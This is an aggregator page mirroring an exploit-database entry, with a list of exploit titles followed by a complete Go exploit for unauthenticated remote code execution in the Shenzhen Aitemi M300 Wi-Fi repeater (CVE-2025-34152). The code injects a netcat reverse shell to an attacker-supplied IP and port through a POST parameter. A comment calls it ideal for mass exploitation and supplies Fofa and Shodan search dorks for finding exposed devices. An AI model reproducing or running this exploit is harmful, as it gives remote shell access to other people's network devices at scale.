惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

博客园 - 叶小钗
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Microsoft Security Blog
Microsoft Security Blog
罗磊的独立博客
大猫的无限游戏
大猫的无限游戏
美团技术团队
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
aimingoo的专栏
aimingoo的专栏
腾讯CDC
WordPress大学
WordPress大学
Apple Machine Learning Research
Apple Machine Learning Research
F
Fortinet All Blogs
G
Google Developers Blog
MongoDB | Blog
MongoDB | Blog
Microsoft Azure Blog
Microsoft Azure Blog
小众软件
小众软件
Engineering at Meta
Engineering at Meta
博客园_首页
B
Blog RSS Feed
D
Docker
M
MIT News - Artificial intelligence
爱范儿
爱范儿
I
InfoQ

The Exploit Database - CXSecurity.com

ProFTPD mod_sql post-authentication SQLi RCE Joomla Extension 4.1.4 PHP Object injection LuCI DHCPv6 Lease Hostname Stored Cross-Site Scripting strongSwan 5.9.13 DoS - CXSecurity.com OrkesConductor 3.30.2 Unauthenticated Remote Code Execution ArcadeDB < 26.7.2 Cross-Database Authorization Bypass (IDOR) Joomla Page Builder CK <= 3.5.10 - Unauthenticated Arbitrary File Upload (RCE) Microsoft Edge <= 150.0.4078.48 (Chromium-based) Type Confusion RCE PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution
Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE
2025-08-08 · via The Exploit Database - CXSecurity.com

Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE

package main import ( "flag" "fmt" "io" "net/http" "net/url" "os" "strings" ) /* Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (CVE-2025-34152) - does not require authentication (even when the login panel is enabled) - does not reboot the device - does not affect network configuration - ideal for automated exploitation at scale Dorks: - Fofa: icon_hash="-741058468" && server="lighttpd/1.4.32" - Shodan: http.favicon.hash:-741058468 lighttpd/1.4.32 */ func main() { host := flag.String("u", "", "Target host URL (e.g., http://192.168.11.1)") lhost := flag.String("i", "", "Attacker IP for reverse shell") lport := flag.String("p", "", "Attacker port for reverse shell") proxyURL := flag.String("x", "", "Optional proxy URL (e.g., http://127.0.0.1:8080)") flag.Parse() if *host == "" || *lhost == "" || *lport == "" { fmt.Printf("Usage: %s -u <host_url> -i <lhost> -p <lport> [-x <proxy_url>]\n", os.Args[0]) os.Exit(1) } h := strings.TrimRight(*host, "/") endpoint := h + "/protocol.csp?" raw := fmt.Sprintf("$(mkfifo /tmp/x; nc %s %s < /tmp/x | /bin/sh > /tmp/x 2>&1)", *lhost, *lport) encoded := url.QueryEscape(raw) encoded = strings.ReplaceAll(encoded, "+", "%20") body := fmt.Sprintf("fname=system&opt=time_conf&function=set&time=%s", encoded) req, err := http.NewRequest("POST", endpoint, strings.NewReader(body)) if err != nil { fmt.Printf("[!] Request creation failed: %v\n", err) os.Exit(1) } transport := &http.Transport{} if *proxyURL != "" { parsedURL, err := url.Parse(*proxyURL) if err != nil { fmt.Printf("[!] Invalid proxy URL: %v\n", err) os.Exit(1) } transport.Proxy = http.ProxyURL(parsedURL) } client := &http.Client{Transport: transport} resp, err := client.Do(req) if err != nil { fmt.Printf("[!] Request failed: %v\n", err) os.Exit(1) } defer resp.Body.Close() fmt.Printf("[+] Response %d\n", resp.StatusCode) data, err := io.ReadAll(resp.Body) if err != nil { fmt.Printf("[!] Reading response failed: %v\n", err) os.Exit(1) } fmt.Println(string(data)) }



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}